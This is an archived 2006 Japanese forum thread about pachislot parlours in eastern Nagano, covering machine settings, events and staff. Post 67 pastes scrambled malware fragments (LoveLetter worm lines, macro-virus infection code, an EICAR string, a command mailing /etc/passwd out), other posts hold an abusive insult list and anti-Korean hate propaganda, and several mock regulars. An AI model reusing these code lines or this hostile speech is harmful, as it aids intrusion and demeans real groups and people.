5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【人の夢と書いて】長野県東信スロ板8【儚い】

1 :仏波:2006/11/21(火) 07:51:45 ID:zWwU/6oU
         ァーi、    ィ¬i、     _______、
           |  |  ._,,,l゙  ヽ---┐  | 、,_、    .|
          ,/ │ .|        |  | ゙l ` ゙゙゙̄l  |
      ._/ ./  .冖'''',!  '|''''''''''″ .| .|    .|  .|
    ,,/.,rI |    .l'''''''"   ゙゙゙̄|   | {    .|  |
   ┴‐''" .| |    `'''¬ッ .l''''''"   | .|,,----l゙  |
          | |       |  |      |,,,,,,,,,,,,,,,,,,,,,,,,,.!
          | |       ミ,,,,l゙
          トノ

2 :仏波:2006/11/21(火) 07:54:56 ID:zWwU/6oU
前スレ
http://news18.2ch.net/test/read.cgi/slotj/1157381200/l50

3 :「名無しわざとか?」とかイヤミを言われた:2006/11/21(火) 13:10:40 ID:WMPjMiXW
3

4 :「名無しわざとか?」とかイヤミを言われた:2006/11/21(火) 14:15:45 ID:zNyWUfJx


5 :「名無しわざとか?」とかイヤミを言われた:2006/11/21(火) 19:35:42 ID:3GBfMoDq


6 :「名無しわざとか?」とかイヤミを言われた:2006/11/21(火) 19:38:16 ID:PwLLv3sh
糞スレ立てるなカス野郎
死ね・くたばれ・消えろ・失せろ・潰れろ・馬鹿・あほ・間抜け・ドジ。
ポンコツ・トンチキ・ガラクタ・クズ・ゴミ・カス・最低以下の下劣・下等種族。
劣等種族・下衆野郎・腐れ外道・邪道・外道・非道・ウジ虫・害虫・ガン細胞。
ウィルス・ばい菌・疫病神・病原体・汚染源・公害・ダイオキシン・有毒物質。
廃棄物・発ガン物質・猛毒・毒物・アメーバ・ダニ・ゴキブリ・シラミ・ノミ。
毛虫・蠅・蚊・ボウフラ・芋虫・掃き溜め・汚物・糞・ゲロ・糞虫野郎・ほら吹き。
基地外・ハッタリ・穀潰し・ろくでなし・ごろつき・ヤクザ者。
社会の敵・犯罪者・反乱者・前科者・インチキ・エロ・痴漢・ゴミ・シデムシ。
ゴミ虫・毒虫・便所コオロギ・詐欺師・ペテン師・道化師・危険分子・痴呆・白痴。
魔物・妖怪・悪霊・怨霊・死神・貧乏神・奇天烈・奇人・変人・毒ガス・サリン。
ソマン・マスタードガス・イペリット・クソブタ・ブタ野郎・畜生・鬼畜・悪鬼。
邪気・邪鬼・ストーカー・クレイジー・ファッキン・サノバビッチ・シット・ガッデム。
小便・便所の落書き・不要物・障害物・邪魔者・除け者・不良品・カビ・腐ったミカン。
土左衛門・腐乱・腐臭・落伍者・犯人・ならず者・チンカス・膿・垢・フケ・化膿菌。
放射能・放射線・鬼っ子・異端者・妄想・邪宗・異教徒・恥垢・陰毛・白ブタ。
ケダモノ・ボッコ・ろくでなし・VXガス・ヒ素・青酸・監獄・獄門・さらし首。
打ち首・市中引きずり回し・戦犯・絞首刑・斬首・乞食・浮浪者・ルンペン・物乞い。
放射性廃棄物・余命1年・アク・割れたコップ・精神年齢7歳・3審は必要なし。
不良品、規格外、欠陥品、不要物、埃、掃き溜め、吹き溜まり、塵埃、インチキ、居直り。
ふてぶてしい、盗人、盗賊、残忍、残酷、冷酷、非情、薄情者、ガキ、クソガキ。
ファッキン、ガッデム、サノバビッチ、シット、ブルシット、ボロ、ボッコ、妄信。
狂信者、有害物質、毒薬、猛毒、発ガン物質、誇大妄想狂。
他人の悪口は山ほどほざくが反省は一切しないガキ根性野郎、腐れ根性。
腐って歪んだプライドの持ち主、狭量、ボケ、ボケナス、アホンダラ、たわけ。
怠け者、無能、無脳、脳軟化症、思考停止、アメーバ、単細胞、蠅、蚊、カビ。
腐敗、膿、下劣、下等生物、劣等種族、クレイジー、マッド、ストーカー。
人格障害、守銭奴、見栄っ張り、ええ格好しい、粗製濫造品、偽物、似非
イカレ、乞食、浮浪者、龍神、ルンペン、狼藉者、放蕩息子、道楽息子、極道息子。
迷惑、困りもの、厄介者、村八分、異端者、アウトサイダー
大虐殺者、痰壺男、ナチスドイツ、731部隊、ポルポト派らと同類。
死ね・くたばれ・消えろ・失せろ・潰れろ・馬鹿・あほ・間抜け・ドジ。
ポンコツ・トンチキ・ガラクタ・クズ・ゴミ・カス・最低以下の下劣・下等種族。
劣等種族・下衆野郎・腐れ外道・邪道・外道・非道・ウジ虫・害虫・ガン細胞。
ウィルス・ばい菌・疫病神・病原体・汚染源・公害・ダイオキシン・有毒物質。
廃棄物・発ガン物質・猛毒・毒物・アメーバ・ダニ・ゴキブリ・シラミ・ノミ。
毛虫・蠅・蚊・ボウフラ・芋虫・掃き溜め・汚物・糞・ゲロ・糞虫野郎・ほら吹き。
基地外・デタラメ・ハッタリ・穀潰し・ろくでなし・ごろつき・ヤクザ者。
ソマン・マスタードガス・イペリット・クソブタ・ブタ野郎・畜生・鬼畜・悪鬼。
邪気・邪鬼・ストーカー・クレイジー・ファッキン・サノバビッチ・シット・ガッデム。
小便・便所の落書き・不要物・障害物・邪魔者・除け者・不良品・カビ・腐ったミカン。
土左衛門・腐乱・腐臭・落伍者・犯人・ならず者・チンカス・膿・垢・フケ・化膿菌。
放射能・放射線・鬼っ子・異端者・妄想・邪宗・異教徒・恥垢・陰毛・白ブタ。
ケダモノ・ボッコ・ろくでなし・VXガス・ヒ素・青酸・監獄・獄門・さらし首。
打ち首・市中引きずり回し・戦犯・絞首刑・斬首・乞食・浮浪者・ルンペン・物乞い。
放射性廃棄物・余命1年・アク・割れたコップ・精神年齢7歳・3審は必要なし。
不良品、規格外、欠陥品、不要物、埃、掃き溜め、吹き溜まり、塵埃、インチキ、居直り。
ふてぶてしい、盗人、盗賊、残忍、残酷、冷酷、非情、薄情者、ガキ、クソガキ。
ファッキン、ガッデム、サノバビッチ、シット、ブルシット、ボロ、ボッコ、妄信。
狂信者、有害物質、毒薬、猛毒、発ガン物質、誇大妄想狂。
他人の悪口は山ほどほざくが反省は一切しないガキ根性野郎、腐れ根性。
腐って歪んだプライドの持ち主、狭量、ボケ、ボケナス、アホンダラ、たわけ。


7 :「名無しわざとか?」とかイヤミを言われた:2006/11/21(火) 20:00:30 ID:MZFbKaXa
アグリアスかよ

8 :「名無しわざとか?」とかイヤミを言われた:2006/11/21(火) 20:57:33 ID:zNyWUfJx
6
オマエ頭いいなぁ
それだけ思い付けば博識だぞ!

9 :「名無しわざとか?」とかイヤミを言われた:2006/11/22(水) 00:30:58 ID:oXVVSudV
>>7
コーネリアス

10 :「名無しわざとか?」とかイヤミを言われた:2006/11/22(水) 00:52:06 ID:TcjIzlxr
>>7

ちょwwwFFTかよwww

11 :「名無しわざとか?」とかイヤミを言われた:2006/11/22(水) 09:00:33 ID:RdmNldbS
>>6
やっとコピペ出来る様になったんだね。
よかったよかった。

12 :「名無しわざとか?」とかイヤミを言われた:2006/11/23(木) 01:53:36 ID:a6fK4nLW
ヤホ番長でたんか?

13 :「名無しわざとか?」とかイヤミを言われた:2006/11/23(木) 22:48:27 ID:DaJbLlmH
ウスラハゲアルシンド天頂ご苦労さま(>_<) 今日はどこに出したの?

14 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 00:55:16 ID:RB6biUjx
直接聞きゃいいじゃねーか!

15 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 05:56:18 ID:Q462wO4J
これまで誹謗中傷をされた方々へ。
既に会社専属の弁護士に相談し、営業妨害及び名誉毀損で訴訟を起こす準備をしております。
事実無根な情報を書き込まれ、大変迷惑をしております。

16 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 09:51:00 ID:JFKyP5vK
北斗よりは5号機のがましだろw

17 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 10:23:06 ID:2CxU0Ihp
↑娘、蜘蛛のMAXならね!ただ使わないだろうな。

18 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 11:57:37 ID:ugsRR7wJ
15
テメーわ、ウスラハゲアルシンド天頂か?

19 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 12:18:08 ID:8r6mr/db
6でも誰もやらない北斗や番長に6入れるから
5号機に設定入れられないんじゃない?
つか、蜘蛛ってなんで設置少ないの?


20 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 13:02:20 ID:2CxU0Ihp
↑セテイ入れられないのは全体の売り上げ大幅ダウン、5号機の値上げが原因の大半ですよ。つまり還元する余裕ないって事。
バンチョ、SEはほぼセテイ判別無理だからイベ内容と合ってるか真実はわかりません。最近の機種だと悲報以外セテイ判別は難しいんじゃないかな。

21 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 15:06:00 ID:8r6mr/db
>>20
じゃあ、来週辺りから発売になる5号機も
入れないんですかねえ(~_~;)
ちょっと楽しみにしてたのに。。。

22 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 15:57:07 ID:EviPRTgW
うるせい!み○ざ○!師ね!

23 :「名無しわざとか?」とかイヤミを言われた:2006/11/24(金) 20:54:01 ID:2CxU0Ihp
20さん残念だけどあまり期待しないほうが…
あと5号機はMAXセテイでも一部除いて全くおいしくないですよ。
とりあえずセテイ読みやすい悲報にMAX入れてるかで店のやる気を計ってます。後は古いカイジとか。
メールで煽るだけじゃ実際分からないかね。

24 :「名無しわざとか?」とかイヤミを言われた:2006/11/25(土) 15:48:53 ID:G7qSzpYx
夢屋のスロットはボタンがなんかペトペトする。
あとコインも。

25 :「名無しわざとか?」とかイヤミを言われた:2006/11/25(土) 19:58:31 ID:2Ua7Yc3x
それはハナクソがついてるからだよ

26 :「名無しわざとか?」とかイヤミを言われた:2006/11/25(土) 20:21:22 ID:jb63dnjn
今日もウエッティー番長で台をシバキ上げてたね♪凄いカッコよかった はぁと
横で打ってたコジキみたいな子おびえてたよ‥
ダーリン台を殴るのは、ほ・ど・ほ・に!だっちゃ☆

27 :「名無しわざとか?」とかイヤミを言われた:2006/11/25(土) 23:38:06 ID:dZwmIi2G
夢やの話題でてるけど、あそこいって勝ってる奴いるのか?
23・24 日本一に挑戦 25 夢やの日 ってイベやってたから夜見にいって3日分のデータ見たんだが、あんなの通常営業と変わらねーじゃん。
つーか通常営業以下、なんであれで稼動いいの? 打ってる奴見てこいつら頭が・・・とか思ったよ。
ちなみに真偽はしらんが、夢やグループの中で小諸店が一番稼動いいんだと、それ聞いて他の地域の奴はまともなんだな、それに比べてこの地域の奴らはまさに家畜だなとか思ったよ。
馬鹿だと状況の判断できないんだろうな、やっぱ全国一偏差値低いとこは一味違うわ、勉学の大切さってもんをつくずく感じたよ。


28 :「名無しわざとか?」とかイヤミを言われた:2006/11/26(日) 00:27:52 ID:jr4gQ0Mf
>>27
>勉学の大切さってもんをつくずく感じたよ。

文面から察するに、感じるのが遅すぎだよ。
つくずくw


29 :「名無しわざとか?」とかイヤミを言われた:2006/11/26(日) 00:43:25 ID:ONyuDiQX
>>28
君夢常連?勝ってるならそういう対応でいいと思うけど、負けてて俺の書いてるものに対してそれしか感じる事ないならまさに家畜以下。
ちなみに漫画で知ったんだが、豚って衛生面にきをつけて掃除を頻繁にしてやらんと病気になってすぐ死ぬんだと。
それ考えたら正に、家畜以下だろ。どんな劣悪な環境になってもそれにすら気付かず平然としてるんだから。
もう正しい家畜道つらぬけや君わw どんなに負けても切れんよな 家畜w

30 :「名無しわざとか?」とかイヤミを言われた:2006/11/26(日) 00:56:49 ID:WriPxcxj
日本一の○った○りに挑戦?

31 :「名無しわざとか?」とかイヤミを言われた:2006/11/26(日) 05:22:58 ID:DSn8w5ZD
あげ

32 :「名無しわざとか?」とかイヤミを言われた:2006/11/26(日) 11:30:16 ID:hNtG6cZ4
ボヌス回収期はじまってるね。
設定なんて入れるわきゃね。
でも漏れは自分のボヌスを稼ぎに今日も逝く。

33 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 00:27:02 ID:vTeEq+N+
デブとメガネは早く師ね!早くつぶれろ!

34 ::2006/11/28(火) 08:39:06 ID:mJWRaQOq
しゃくれ拾いも

35 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 10:54:30 ID:IttNHGuP
34
拾いのオカ○のこと?

36 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 10:56:52 ID:IttNHGuP
34
違ったらごめんね。

37 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 14:24:02 ID:m7SXqPuF
http://i.z-z.jp/?bokumetu

38 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 18:27:03 ID:S1/BZ4sW
編はサンダー出てますか?
やっと5号機に力入れだしたのかな??

39 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 20:06:12 ID:3/D97jNi
↑5号械に期待してるのですか?サンダーなら6でなんとかなる程度。
店は出す余裕ないですよ。全6でも糞5号機なら店が儲かるでしょう。(人件費粗利益引けば赤かも)
蜘蛛も6にだけロマン感じるけど滅多に使わないでしょう。ボーナスの分母が大きすぎて実際の設定は知りませんけど。

40 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 21:48:21 ID:4ZX5d9PK
編、5号機オールMAXって・・・なんで?あんなに出ない5号機ばっかし導入すんの?

41 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 21:48:57 ID:TVdM2tba
蟻の秘宝伝って裏物っぽくないですか
ぼくはそう思いました

42 :「名無しわざとか?」とかイヤミを言われた:2006/11/28(火) 23:38:34 ID:aCv3KtT2
まず、裏入れた場合のリスク考えてから発言しろ。

43 :「名無しわざとか?」とかイヤミを言われた:2006/11/29(水) 00:11:05 ID:FWrG+jJM
来年の6月にはオール5号機になるんだぞ!今から徐々に入れ替えしなければ、どうにもならんだろ!
現状考えてる編むはいいんじゃね!

44 :「名無しわざとか?」とかイヤミを言われた:2006/11/29(水) 00:11:31 ID:BgMg2h7D
蟻の悲報はまともじゃねーか?かなりなっとくいかない展開の悲報が他の店ではある。けど確率的にありえない展開は昔からよくあるからなぁ。
どう裏に感じたか是非教えて!

45 :「名無しわざとか?」とかイヤミを言われた:2006/11/29(水) 01:34:43 ID:1u1dEMhK
どこの秘宝が1番マズイと思う?

46 :「名無しわざとか?」とかイヤミを言われた:2006/11/29(水) 09:52:05 ID:g7aVYu+a
>>43
5号機入れるのはいいんだけどアルゼ系はいらないだろ?
サンダーは期待してたけどダメみたいね。
>>45
悲報はゲームやってみても確立的にありえないだろ?
って展開になる事多いからわからないねw
もしかして普通に出てる感じがする台が裏なのかもww
オレは編でも蟻でも、信じられないような展開になった事あるよ。

47 :「名無しわざとか?」とかイヤミを言われた:2006/11/29(水) 19:43:41 ID:etct2FUV
編のサンダーは出てるのか?
本当に赤字なのか?

48 :「名無しわざとか?」とかイヤミを言われた:2006/11/29(水) 21:45:56 ID:sKt1wePw
>>47

否ッ!!

49 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 01:09:36 ID:5znqbLtk
だけどこの辺じゃ編むが優良店になっちまったな!
他ひでー店ばかりになったな(-_-;)


50 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 08:06:48 ID:ZHNty0n5
49 こいつ…… キケンだ 気を付けろ

51 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 08:50:44 ID:ixdNl2MT
   ____
     /⌒  ⌒\
   /( ●)  (●)\
  /::::::⌒(__人__)⌒::::: \
  |     |r┬-|     |  おじちゃん、どうして働かないんだお?
  \      `ー'´     /
   /` ‐- __ - ‐‐ ´ \
  / .l        _,,ヽ ___ 〉、
  | l       / ,' 3 `ヽーっ
  ヒト- _    l   ⊃ ⌒_つ
.   !__   ̄, ̄ `'ー-┬‐'''''"
   L  ̄7┘l-─┬┘
    ノ  ̄/  .! ̄ ヽ
  └‐ '´   ` -┘


52 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 10:51:46 ID:v39KSlDO
東御のパラ塩の前通ったら〔スロット〇丸〕と看板あったがスロ専?
この時期グランドとはいい度胸だ。いつオープンだろ?

53 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 12:27:30 ID:SeMkLjJL
>>46 wwwwwwwwwwwwwwwwwwwww

54 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 14:08:15 ID:dbMj0I6B
52
スロ専夢○年末にグランドオープンお友達お誘いの上遊びに来てね!


55 :「名無しわざとか?」とかイヤミを言われた:2006/11/30(木) 14:58:40 ID:ezNPGSvM
詳しい椰子!やっぱりコテハンしたいから
東信は浅間は活火山だろ!誰か版立ててよ!
伝統の浅間は活火山!潰さないで・・・
ぼれー店は潰れろ!

56 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 07:42:18 ID:sSD0Iw1K
>>54
年末にオープンてこたあ最初っから期待薄だなこりゃ。
>>55
意味不明

57 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 11:00:21 ID:+6ZQCGVj
どこにオープンするの?

58 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 11:30:03 ID:qcBdynZ4
↑52見ろ、寝墓毛くん。

59 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 12:51:17 ID:sOZ8kiyv
編む糞に戻ったな(>_<)  少し期待したアタシがバカだったのかな!

60 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 13:50:06 ID:l3/qQtxQ
ホントにアムは糞に戻ったわ。まぁ、編むが客から金吸い取らきゃ$グループはパンクだからそっちの意味での最重要店舗認定だからみんな騙されないでね。

61 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 17:38:13 ID:P7vZRDaW
編むあれで糞なら他店はどうすりゃいいんだよ。糞以下じゃん。
糞と言えば、まっ糞!常連っぽい人達誰も居なかったけど、なんかあったの?ほかに客全然いなかったし…。

62 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 18:58:27 ID:jrg+7K2H
夢丸行ってる人〜レポよろ〜
P-world見ても設置台がわからん
126台の6枚交換しか載ってね

63 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 19:19:14 ID:qcBdynZ4
6枚って…
営業前から終了してまつ。

64 :「名無しわざとか?」とかイヤミを言われた:2006/12/01(金) 23:31:22 ID:W/eapY2g
ほんと編ひどいわ!他店のがマシですよ。2階は幽霊でそうだね(笑)

65 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 00:33:49 ID:hATuHusm
まるでパラシオ

66 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 05:05:02 ID:oTvs4iKz
まッ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞まっ糞
イベントで勝った時ね〜(-_-)ちょうボッタじゃん。ガセイベントばかりじゃん!

67 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 10:49:03 ID:KkqFXc2/
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub


68 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 18:33:19 ID:sYLErUmM
>>67 ヤバいもん載せんなよ、まぁ意味解る奴が居る可能性低いケド…。

69 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 18:36:34 ID:z/fXp4O5
どんな意味ですか?
とっても気になるなぁ。

70 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 19:19:12 ID:sYLErUmM
釣り

71 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 22:48:13 ID:urhnJQ0k
ちょwwwヤバすぎ。アイポリス動いたらやばいぞ>>67

72 :「名無しわざとか?」とかイヤミを言われた:2006/12/02(土) 23:12:39 ID:z/fXp4O5
ねーねーどんな意味なの?サッパリわからんよー
K1カンドーしたね!スレ違いでゴメン。

73 :「名無しわざとか?」とかイヤミを言われた:2006/12/03(日) 03:10:49 ID:A8EPvthB
ボーナス期だけにどこも出てねーな!
サンダーだろうが何だろうが、5号機じゃあたかが知れてるし。
これからどうすりゃいいんだ?・・・>店とスロニート

74 :「名無しわざとか?」とかイヤミを言われた:2006/12/03(日) 06:48:29 ID:IytzqaWh
スロニート負け組み!先は信頼のないバカな大人!
どうしようもない椰子はホームレス『一確』
経営努力もしない、客をなめ切ってる店は潰れるのは時間の問題!
オーナーは今までの財産で別に苦もなし!そこで働いてた従業員は路頭に迷う!
人生よく考えろ

75 :「名無しわざとか?」とかイヤミを言われた:2006/12/03(日) 20:03:41 ID:pwdWAE4/
パチ屋周辺のウマイ店紹介しよや。

76 :「名無しわざとか?」とかイヤミを言われた:2006/12/03(日) 22:37:54 ID:a8dM9jmk
〇夢いいんじゃない?
メールだと蛙お勧めだったけどね。短時間だし6枚だし、もしや今日の蛙全6?

77 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 04:13:40 ID:cUpCGV8a
新規オープンの店のHP見て吹いたw

今週のナンバーワンで夢々DXの5500枚ってwww

78 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 07:17:14 ID:CMX8Er6A
あそこはまず店名で笑うよな。

昨日、蟻と編む行ったんだけど両方ともガラガラだった…
高設定入っていても島に1つぐらいかな。
今って混んでる店ってどこ?

79 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 08:20:04 ID:C3snCQdv

          ∧_∧
         <丶`∀´> クックック
         ( ∪ ∪

「日本のパチンコ産業が北朝鮮を支えている」…金正日会談議事録
http://news2.2ch.net/newsplus/kako/1045/10457/1045734252.html

パチ屋の9割が韓国・北朝鮮籍
http://sylphys.ddo.jp/upld2nd/gamble/img-box/img20060210154525.jpg
http://area09.air-nifty.com/annex/2006/02/213_49b6.html

玉の出具合をパソコンで遠隔操作♪
http://www.youtube.com/watch?v=nqcxbe8Dp2w

在日パチ屋が「79億円!」の所得隠し(注:パチンカスから回収した金w)
http://www.nikkei.co.jp/news/shakai/20060912AT1G1200Y12092006.html
http://www.iza.ne.jp/news/newsarticle/event/crime/19058/

パチンコ・パチスロの真実 (おすすめ)
http://pachinkokouryaku.fc2web.com/

          ∧_∧
         <丶`∀´> クックック
         ( ∪ ∪   低能な日本人猿はパチ・スロを打って我々に貢ぐニダ♪


80 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 08:27:56 ID:Ha5Fdp2/
>>77
秘宝の無い辺りと併せて、最初っから苦しそうだよな。
どれだけもつのか興味深い。
>>78
高設定一台あれば編むにしては出してる方かも。
夢屋が一番かな?それともヤッホーか?混んでるのは・・・

81 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 13:19:04 ID:P32S5Fsq
今から悪、まっ糞の辺りをふらついてくるぜ!

82 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 14:10:01 ID:XQN6ZAMk
編むの浮浪者ニートウザすぎ!打ちもしねーで女店員追っ掛け回して見苦しいんだよ!サービスの妨げもいいとこだ。

83 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 17:38:49 ID:8flpAq9F
ああ、あれが浮浪者ニートなんだww
でも、あんな汚いのに追いかけ回されても
女店員はニコニコしてましたよwww

84 :「名無しわざとか?」とかイヤミを言われた:2006/12/04(月) 20:01:54 ID:LWehNddS
編むの店員も可愛い女いないからいいんじゃなぃ。

85 :「名無しわざとか?」とかイヤミを言われた:2006/12/05(火) 00:31:22 ID:hFl0ZqDg
八歩の情報下さい!でてますか?

86 :「名無しわざとか?」とかイヤミを言われた:2006/12/05(火) 06:55:57 ID:Yf4QfufR
>>82-83
店員だからさすがに怒ったりでいんだろ。相手が相手だけに・・・
助けてやれば、その店員だけでなく他の客からも尊敬されるかもよ。

>>84
おまいが可愛いと思う店員のいる店教えれ。
ヤホだたら通!!
俺あ佐久バビに一票!!

87 :「名無しわざとか?」とかイヤミを言われた:2006/12/05(火) 07:24:15 ID:+uEVCPEi
削場美どこが??
女の店員はみんなかったるそう。可愛くないし。

88 :「名無しわざとか?」とかイヤミを言われた:2006/12/05(火) 18:10:24 ID:Yf4QfufR
>>87
だがそれがイイ!!

89 :「名無しわざとか?」とかイヤミを言われた:2006/12/05(火) 19:42:33 ID:3//0u9gT
酷侮のカウンターもかわいいぞ。

90 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 14:17:48 ID:grcmkAZv
削場美の女店員、普通に(ブ)じゃね?人にはそれぞれタイプあるからいいんだけど。
漏れは編のカウンターまあまあカワイイと思うが。

91 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 14:58:18 ID:0+syWYrb
ポパイダーマンとジャックはいってるとこある?

92 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 18:20:20 ID:NJS61IUj
夢にいるメガネぼーず本当になんとかしろ!!


93 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 18:48:40 ID:YDiazM68
アムにいるチビのコジキ原付ボーヤもなんとかしてくれ。

94 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 18:53:24 ID:4gAxso8B
鼻○と海○か…ほっとけ‥。

95 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 19:35:02 ID:HVK0Vk5K
↑同意。気にしないほうがいいぞ!それが出来なくて、個人的に文句あるなら、こんなとこ書いてないで直接言えば?

96 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 21:07:11 ID:KPsMjrAY
蟻のメール会員登録、何回申し込んでもメール送られてこないんだけど
迷惑メールフィルターに引っかかってるのかな
もしかしてドメイン「@0268.jp」じゃないの?

97 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 21:28:19 ID:KPsMjrAY
自己解決しました
@0268.netだったようです

98 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 22:24:24 ID:lAkqNJjW
上田場美マジで銭型1/4でMAXなのか?全然出てねーじゃねーか!

99 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 22:41:31 ID:grcmkAZv
まんまとだまされましたねo〔^C^〕o

100 :「名無しわざとか?」とかイヤミを言われた:2006/12/06(水) 22:50:43 ID:UkE/ySz1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1

101 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 01:05:35 ID:Zo91PlUa
>>98
当店では2がMAXですっていわれたら、それまで とかどっかの本にのってたけどそういうことじゃねーの。
つーか夢屋のドリームの方が曖昧でなんでもあり、今日ジャック豆オールドリ−ムとかメール来たから見にいったら、出てるとかそういう問題じゃく客がいなかった。
なんですかね、あれ。
まー1でも出す事にこそ客の夢があるっていわれたらたしかにそうだが。
もうメール切ろうかと思うよね、実害は喰らってないが、腹はたつわな。

102 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 15:29:13 ID:9yj2GU10
まっ糞ふざけるな。

103 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 16:55:30 ID:IP8fkB0P
初めてMAX行ってみたけどマジでまっ糞だなW
糞すぎてワロス

104 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 20:45:27 ID:kH5v9w3b
俺もまっ糞逝ったけど、アホ丸出しに負けた!

105 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 21:44:09 ID:QuJHHOTw
今頃なぜかまっ糞が話題になってるな!?
そんなに出ないなら(しかも6枚だっけ?)行くだけ無駄なのは火を見るより明らかな筈。

106 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 22:25:59 ID:U/HW//8m
まっ糞は以前にピースサインが出てるパチイベント行ったな・・・
はい、ガチガチでしたwwww
回収率が2倍ってことですねwww

107 :「名無しわざとか?」とかイヤミを言われた:2006/12/07(木) 23:57:17 ID:Kl6clmMV
おい!針木の万枚ネーちゃん最近どーした?

108 :万枚ねーちゃん:2006/12/08(金) 00:35:58 ID:mGKFYlGC
